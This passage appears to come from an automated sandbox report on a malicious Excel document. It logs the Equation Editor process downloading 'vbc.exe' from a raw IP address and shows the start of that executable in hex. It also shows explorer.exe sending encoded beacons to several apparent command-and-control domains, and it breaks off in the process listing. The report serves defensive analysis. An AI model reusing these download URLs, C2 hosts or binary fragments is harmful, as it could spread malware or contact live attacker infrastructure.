                                                    Sep 15, 2021 11:13:26.805762053 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.102168083 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.102224112 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.102273941 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.102293015 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.102296114 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.102328062 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.102340937 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.102340937 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.102364063 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.102394104 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.102408886 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.102410078 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.102432013 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.102468967 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.102490902 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.397088051 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.397164106 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.397201061 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.397258043 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.397289991 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.397319078 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.397428989 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.397471905 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.397519112 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.397556067 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.397742033 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.397779942 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.397804976 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.397852898 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.397861004 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.397872925 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.397893906 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.397902966 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.397913933 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.397931099 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.397948027 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.397970915 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.397972107 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.397991896 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.397993088 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.398017883 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.400145054 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.692107916 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692132950 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692148924 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692166090 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692197084 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.692231894 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.692251921 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692266941 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692317963 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.692342997 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.692368031 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692387104 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692401886 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692410946 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.692416906 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692435980 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692449093 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692456007 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.692460060 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.692461967 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.692465067 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692481995 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692491055 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.692497969 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692501068 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.692516088 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692517996 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.692533970 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692537069 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.692548990 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692557096 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.692564964 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692579985 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692590952 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692601919 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692614079 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692627907 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692635059 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.692640066 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.692642927 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692655087 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.692658901 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692665100 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.692673922 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692682981 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.692688942 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692691088 CEST4916580192.168.2.22103.133.106.199
                                                    Sep 15, 2021 11:13:27.692704916 CEST8049165103.133.106.199192.168.2.22
                                                    Sep 15, 2021 11:13:27.692713022 CEST4916580192.168.2.22103.133.106.199

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Sep 15, 2021 11:14:40.326247931 CEST5216753192.168.2.228.8.8.8
                                                    Sep 15, 2021 11:14:40.976687908 CEST53521678.8.8.8192.168.2.22
                                                    Sep 15, 2021 11:14:46.410604000 CEST5059153192.168.2.228.8.8.8
                                                    Sep 15, 2021 11:14:46.460666895 CEST53505918.8.8.8192.168.2.22
                                                    Sep 15, 2021 11:14:51.465856075 CEST5780553192.168.2.228.8.8.8
                                                    Sep 15, 2021 11:14:51.868680954 CEST53578058.8.8.8192.168.2.22
                                                    Sep 15, 2021 11:14:57.616641998 CEST5903053192.168.2.228.8.8.8
                                                    Sep 15, 2021 11:14:57.660005093 CEST53590308.8.8.8192.168.2.22
                                                    Sep 15, 2021 11:15:02.814553022 CEST5918553192.168.2.228.8.8.8
                                                    Sep 15, 2021 11:15:02.849364042 CEST53591858.8.8.8192.168.2.22
                                                    Sep 15, 2021 11:15:07.895129919 CEST5561653192.168.2.228.8.8.8
                                                    Sep 15, 2021 11:15:08.252754927 CEST53556168.8.8.8192.168.2.22

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                    Sep 15, 2021 11:14:40.326247931 CEST192.168.2.228.8.8.80x8eb8Standard query (0)www.359326.comA (IP address)IN (0x0001)
                                                    Sep 15, 2021 11:14:46.410604000 CEST192.168.2.228.8.8.80xc18cStandard query (0)www.crownfoamus.comA (IP address)IN (0x0001)
                                                    Sep 15, 2021 11:14:51.465856075 CEST192.168.2.228.8.8.80xfc43Standard query (0)www.thvsjwjvy.icuA (IP address)IN (0x0001)
                                                    Sep 15, 2021 11:14:57.616641998 CEST192.168.2.228.8.8.80x9c63Standard query (0)www.biotechfla.comA (IP address)IN (0x0001)
                                                    Sep 15, 2021 11:15:02.814553022 CEST192.168.2.228.8.8.80x30e0Standard query (0)www.absolutalibertas.comA (IP address)IN (0x0001)
                                                    Sep 15, 2021 11:15:07.895129919 CEST192.168.2.228.8.8.80x9037Standard query (0)www.carlsbadbeachwear.comA (IP address)IN (0x0001)

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                    Sep 15, 2021 11:14:40.976687908 CEST8.8.8.8192.168.2.220x8eb8No error (0)www.359326.comtiaozhuan.zhuanye301.cnCNAME (Canonical name)IN (0x0001)
                                                    Sep 15, 2021 11:14:40.976687908 CEST8.8.8.8192.168.2.220x8eb8No error (0)tiaozhuan.zhuanye301.cn154.91.1.126A (IP address)IN (0x0001)
                                                    Sep 15, 2021 11:14:40.976687908 CEST8.8.8.8192.168.2.220x8eb8No error (0)tiaozhuan.zhuanye301.cn194.59.221.214A (IP address)IN (0x0001)
                                                    Sep 15, 2021 11:14:46.460666895 CEST8.8.8.8192.168.2.220xc18cName error (3)www.crownfoamus.comnonenoneA (IP address)IN (0x0001)
                                                    Sep 15, 2021 11:14:51.868680954 CEST8.8.8.8192.168.2.220xfc43No error (0)www.thvsjwjvy.icu47.91.170.222A (IP address)IN (0x0001)
                                                    Sep 15, 2021 11:14:57.660005093 CEST8.8.8.8192.168.2.220x9c63No error (0)www.biotechfla.combiotechfla.comCNAME (Canonical name)IN (0x0001)
                                                    Sep 15, 2021 11:14:57.660005093 CEST8.8.8.8192.168.2.220x9c63No error (0)biotechfla.com34.102.136.180A (IP address)IN (0x0001)
                                                    Sep 15, 2021 11:15:02.849364042 CEST8.8.8.8192.168.2.220x30e0No error (0)www.absolutalibertas.comabsolutalibertas.comCNAME (Canonical name)IN (0x0001)
                                                    Sep 15, 2021 11:15:02.849364042 CEST8.8.8.8192.168.2.220x30e0No error (0)absolutalibertas.com192.0.78.25A (IP address)IN (0x0001)
                                                    Sep 15, 2021 11:15:02.849364042 CEST8.8.8.8192.168.2.220x30e0No error (0)absolutalibertas.com192.0.78.24A (IP address)IN (0x0001)
                                                    Sep 15, 2021 11:15:08.252754927 CEST8.8.8.8192.168.2.220x9037Server failure (2)www.carlsbadbeachwear.comnonenoneA (IP address)IN (0x0001)

                                                    HTTP Request Dependency Graph

                                                    • 103.133.106.199
                                                    • www.thvsjwjvy.icu
                                                    • www.biotechfla.com
                                                    • www.absolutalibertas.com

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.2249165103.133.106.19980C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    TimestampkBytes transferredDirectionData
                                                    Sep 15, 2021 11:13:26.509690046 CEST0OUTGET /rbi/vbc.exe HTTP/1.1
                                                    Accept: */*
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                    Host: 103.133.106.199
                                                    Connection: Keep-Alive
                                                    Sep 15, 2021 11:13:26.805563927 CEST1INHTTP/1.1 200 OK
                                                    Date: Wed, 15 Sep 2021 09:13:26 GMT
                                                    Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/8.0.9
                                                    Last-Modified: Wed, 15 Sep 2021 07:48:09 GMT
                                                    ETag: "a7e00-5cc03eb5c1717"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 687616
                                                    Keep-Alive: timeout=5, max=100
                                                    Connection: Keep-Alive
                                                    Content-Type: application/x-msdownload
                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 39 a5 41 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 0e 0a 00 00 6e 00 00 00 00 00 00 22 2d 0a 00 00 20 00 00 00 40 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d0 2c 0a 00 4f 00 00 00 00 40 0a 00 a0 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 28 0d 0a 00 00 20 00 00 00 0e 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a0 6b 00 00 00 40 0a 00 00 6c 00 00 00 10 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0a 00 00 02 00 00 00 7c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 2d 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 00 9e 00 00 28 8d 01 00 03 00 00 00 51 01 00 06 28 2b 02 00 a8 01 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 92 00 00 00 00 00 00 00 02 14 7d 01 00 00 04 02 28 15 00 00 0a 00 00 02 28 0d 00 00 06 00 02 72 01 00 00 70 02 28 02 00 00 06 28 16 00 00 0a 6f 17 00 00 0a 00 02 7b 04 00 00 04 02 28 05 00 00 06 6f 17 00 00 0a 00 02 7b 05 00 00 04 72 15 00 00 70 02 28 03 00 00 06 28 16 00 00 0a 6f 17 00 00 0a 00 02 7b 06 00 00 04 02 28 06 00 00 06 6f 17 00 00 0a 00 02 7b 07 00 00 04 02 28 07 00 00 06 6f 17 00 00 0a 00 02 7b 08 00 00 04 02 28 04 00 00 06 6f 17 00 00 0a 00 2a 00 00 13 30 03 00 5f 00 00 00 01 00 00 11 00 28 18 00 00 0a d0 05 00 00 01 28 19 00 00 0a 16 6f 1a 00 00 0a 0a 06 8e 16 fe 03 0b 07 2c 29 00 06 16 9a 74 05 00 00 01 0c 08 6f 1b 00 00 0a 72 2d 00 00 70 28 1c 00 00 0a 0d 09 2c 0a 08 6f 1b 00 00 0a 13 04 2b 14 00 28 18 00 00 0a 6f 1d 00 00 0a 28 1e 00 00 0a 13 04 2b 00 11 04 2a 00 13 30 01 00 1a 00 00 00 02 00 00 11 00 28 18 00 00 0a 6f 1f 00 00 0a 6f 20 00 00 0a 6f 21 00 00 0a 0a 2b 00 06 2a 00 00 13 30 03 00 3a 00 00 00 03 00 00 11 00 28 18 00 00 0a d0 06 00 00 01 28 19 00 00 0a 16 6f 1a 00 00 0a 0a 06 8e 16 fe 01 0b 07 2c 08 72 2d 00 00 70 0c 2b 10 06 16 9a 74 06 00 00 01 6f 22 00 00 0a 0c 2b 00 08 2a 00 00 13 30 03 00 3a 00 00 00 03 00 00 11 00 28 18 00 00 0a d0 09 00 00 01 28 19 00 00 0a 16 6f 1a 00 00 0a 0a 06 8e
                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL9Aa0n"- @@ @,O@k H.text( `.rsrck@l@@.reloc|@B-H(Q(+0}((rp((o{(o{rp((o{(o{(o{(o*0_((o,)tor-p(,o+(o(+*0(oo o!+*0:((o,r-p+to"+*0:((o


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1154.91.1.12680192.168.2.2249166C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Sep 15, 2021 11:14:41.409837008 CEST727INHTTP/1.0 200 OK
                                                    Connection: close
                                                    Cache-Control: max-age=259200
                                                    Content-Type: text/html;charset=utf-8
                                                    Content-Length: 429
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 22 20 69 64 3d 22 68 61 6f 31 32 33 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 73 74 72 55 3d 22 68 74 74 70 73 3a 2f 2f 62 6f 6f 73 2e 31 39 36 36 38 39 30 2e 63 6f 6d 3a 32 30 38 36 2f 3f 75 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2b 22 26 70 3d 22 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 2b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 68 61 6f 31 32 33 2e 68 72 65 66 3d 73 74 72 55 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 20 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 68 61 6f 31 32 33 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <html><head></head><body><a href="" id="hao123"></a><script type="text/javascript">var strU="https://boos.1966890.com:2086/?u="+window.location+"&p="+window.location.pathname+window.location.search;hao123.href=strU;if(document.all){document.getElementById("hao123").click();}else {var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("hao123").dispatchEvent(e);}</script></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    2192.168.2.224916747.91.170.22280C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Sep 15, 2021 11:14:52.214354992 CEST729OUTGET /imi7/?8pGdYd7=JylIKvNk78hOFd+1TnqK+cq4SLeKYXMs9BOMQrcpY54MEXf7zcD8i4BM8h1sFc+7G7xGrw==&edrh=onDxIjzxvz HTTP/1.1
                                                    Host: www.thvsjwjvy.icu
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Sep 15, 2021 11:14:52.560082912 CEST729INHTTP/1.1 404 Not Found
                                                    Date: Wed, 15 Sep 2021 09:14:52 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 320
                                                    Connection: close
                                                    ETag: "595213ce-140"
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 66 72 61 6d 65 73 65 74 20 72 6f 77 73 3d 22 31 30 30 25 22 3e 0a 3c 66 72 61 6d 65 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 61 6e 77 61 6e 67 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 2f 70 61 72 6b 69 6e 67 22 3e 0a 3c 6e 6f 66 72 61 6d 65 73 3e 0a 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 3e 0a 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 61 6e 77 61 6e 67 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 64 6f 6d 61 69 6e 2f 70 61 72 6b 69 6e 67 22 3e 6c 69 6e 6b 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 6e 6f 66 72 61 6d 65 73 3e 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0a
                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><frameset rows="100%"><frame src="https://wanwang.aliyun.com/domain/parking"><noframes><body><script> <a href="https://wanwang.aliyun.com/domain/parking">link</a></body></noframes></frameset>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    3192.168.2.224916834.102.136.18080C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Sep 15, 2021 11:14:57.679285049 CEST730OUTGET /imi7/?8pGdYd7=nnh6Wn4YtMnGcYcsMkPyBnKFlLVF5md1d8S2Q13SdHwJLrOdJeCsdNPQR8GZEfRmALPZ9A==&edrh=onDxIjzxvz HTTP/1.1
                                                    Host: www.biotechfla.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Sep 15, 2021 11:14:57.794920921 CEST731INHTTP/1.1 403 Forbidden
                                                    Server: openresty
                                                    Date: Wed, 15 Sep 2021 09:14:57 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 275
                                                    ETag: "6139ed55-113"
                                                    Via: 1.1 google
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    4192.168.2.2249169192.0.78.2580C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Sep 15, 2021 11:15:02.867902994 CEST731OUTGET /imi7/?8pGdYd7=v4OPSvG6dxhfjDw6HF6SnM8N8NyagVc5G1UDhWfJc2g0yYxGB1DXDxzdmmmhzDSPz7MbqA==&edrh=onDxIjzxvz HTTP/1.1
                                                    Host: www.absolutalibertas.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    Sep 15, 2021 11:15:02.884202957 CEST732INHTTP/1.1 301 Moved Permanently
                                                    Server: nginx
                                                    Date: Wed, 15 Sep 2021 09:15:02 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 162
                                                    Connection: close
                                                    Location: https://www.absolutalibertas.com/imi7/?8pGdYd7=v4OPSvG6dxhfjDw6HF6SnM8N8NyagVc5G1UDhWfJc2g0yYxGB1DXDxzdmmmhzDSPz7MbqA==&edrh=onDxIjzxvz
                                                    X-ac: 2.hhn _dfw
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                    Code Manipulations

                                                    Statistics

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Start time:11:12:20
                                                    Start date:15/09/2021
                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                    Imagebase:0x13f780000
                                                    File size:28253536 bytes
                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate

                                                    General

                                                    Start time:11:12:43
                                                    Start date:15/09/2021
                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    Wow64 process (32bit):true
                                                    Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                    Imagebase:0x400000
                                                    File size:543304 bytes
                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:11:12:47
                                                    Start date:15/09/2021
                                                    Path:C:\Users\Public\vbc.exe
                                                    Wow64 process (32bit):true
